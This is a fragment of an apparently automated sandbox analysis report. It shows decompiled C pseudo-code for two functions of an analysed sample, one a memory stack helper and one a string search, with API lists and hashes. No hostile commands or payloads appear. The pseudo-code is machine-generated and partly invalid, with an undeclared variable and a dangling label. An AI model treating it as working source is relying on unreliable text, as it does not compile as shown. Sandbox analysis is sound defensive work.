                                  • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                  • Instruction Fuzzy Hash: FBD0A7A240DD701EF30363108C04B8F7A4CDF12302F090462E041E6194C27C5C418BAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				char* _t17;
                                  				char _t19;
                                  				void* _t20;
                                  				void* _t24;
                                  				void* _t27;
                                  				void* _t31;
                                  				void* _t37;
                                  				void* _t39;
                                  				void* _t40;
                                  				signed int _t43;
                                  				void* _t52;
                                  				char* _t53;
                                  				char* _t55;
                                  				void* _t56;
                                  				void* _t58;
                                  
                                  				 *0x1000405c = _a8;
                                  				 *0x10004060 = _a16;
                                  				 *0x10004064 = _a12;
                                  				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573, _t52);
                                  				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
                                  				_t17 = E1000123B();
                                  				_a8 = _t17;
                                  				_t53 = _t17;
                                  				if( *_t17 == 0) {
                                  					L16:
                                  					return GlobalFree(_a8);
                                  				} else {
                                  					do {
                                  						_t19 =  *_t53;
                                  						_t55 = _t53 + 1;
                                  						_t58 = _t19 - 0x6c;
                                  						if(_t58 > 0) {
                                  							_t20 = _t19 - 0x70;
                                  							if(_t20 == 0) {
                                  								L12:
                                  								_t53 = _t55 + 1;
                                  								_t24 = E10001278(E100012BF( *_t55 - 0x30));
                                  								L13:
                                  								GlobalFree(_t24);
                                  								goto L14;
                                  							}
                                  							_t27 = _t20;
                                  							if(_t27 == 0) {
                                  								L10:
                                  								_t53 = _t55 + 1;
                                  								_t24 = E100012E8( *_t55 - 0x30, E1000123B());
                                  								goto L13;
                                  							}
                                  							L7:
                                  							if(_t27 == 1) {
                                  								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                  								 *_t31 =  *0x10004030;
                                  								 *0x10004030 = _t31;
                                  								E10001525(_t31 + 4,  *0x10004064, _t43);
                                  								_t56 = _t56 + 0xc;
                                  							}
                                  							goto L14;
                                  						}
                                  						if(_t58 == 0) {
                                  							L17:
                                  							_t34 =  *0x10004030;
                                  							if( *0x10004030 != 0) {
                                  								E10001525( *0x10004064, _t34 + 4, _t43);
                                  								_t37 =  *0x10004030;
                                  								_t56 = _t56 + 0xc;
                                  								GlobalFree(_t37);
                                  								 *0x10004030 =  *_t37;
                                  							}
                                  							goto L14;
                                  						}
                                  						_t39 = _t19 - 0x4c;
                                  						if(_t39 == 0) {
                                  							goto L17;
                                  						}
                                  						_t40 = _t39 - 4;
                                  						if(_t40 == 0) {
                                  							 *_t55 =  *_t55 + 0xa;
                                  							goto L12;
                                  						}
                                  						_t27 = _t40;
                                  						if(_t27 == 0) {
                                  							 *_t55 =  *_t55 + 0xa;
                                  							goto L10;
                                  						}
                                  						goto L7;
                                  						L14:
                                  					} while ( *_t53 != 0);
                                  					goto L16;
                                  				}
                                  			}



















                                  APIs
                                    • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                    • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                  • GlobalFree.KERNEL32 ref: 100011B4
                                  • GlobalFree.KERNEL32 ref: 100011C7
                                  • GlobalFree.KERNEL32 ref: 100011F5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloclstrcpy
                                  • String ID:
                                  • API String ID: 852173138-0
                                  • Opcode ID: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                  • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                  • Opcode Fuzzy Hash: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                  • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004057AB(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                  				int _v8;
                                  				int _t12;
                                  				int _t14;
                                  				int _t15;
                                  				CHAR* _t17;
                                  				CHAR* _t27;
                                  
                                  				_t12 = lstrlenA(_a8);
                                  				_t27 = _a4;
                                  				_v8 = _t12;
                                  				while(lstrlenA(_t27) >= _v8) {
                                  					_t14 = _v8;
                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                  					_t15 = lstrcmpiA(_t27, _a8);
                                  					_t27[_v8] =  *(_t14 + _t27);
                                  					if(_t15 == 0) {
                                  						_t17 = _t27;
                                  					} else {
                                  						_t27 = CharNextA(_t27);
                                  						continue;
                                  					}
                                  					L5:
                                  					return _t17;
                                  				}
                                  				_t17 = 0;
                                  				goto L5;
                                  			}










                                  APIs
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059BD,00000000,[Rename]), ref: 004057BB
                                  • lstrcmpiA.KERNEL32(?,?,?,00000000,004059BD,00000000,[Rename]), ref: 004057D3
                                  • CharNextA.USER32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057E4
                                  • lstrlenA.KERNEL32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057ED
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                  • Instruction ID: 633aa132607d7e7766888a4b0686c97eac652c3b38f96583b17865bee0a85c35
                                  • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                  • Instruction Fuzzy Hash: D7F06236504518FFD712DBA5DD4099FBBA8EF05350F2540B9E800F7250D674EE01ABA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%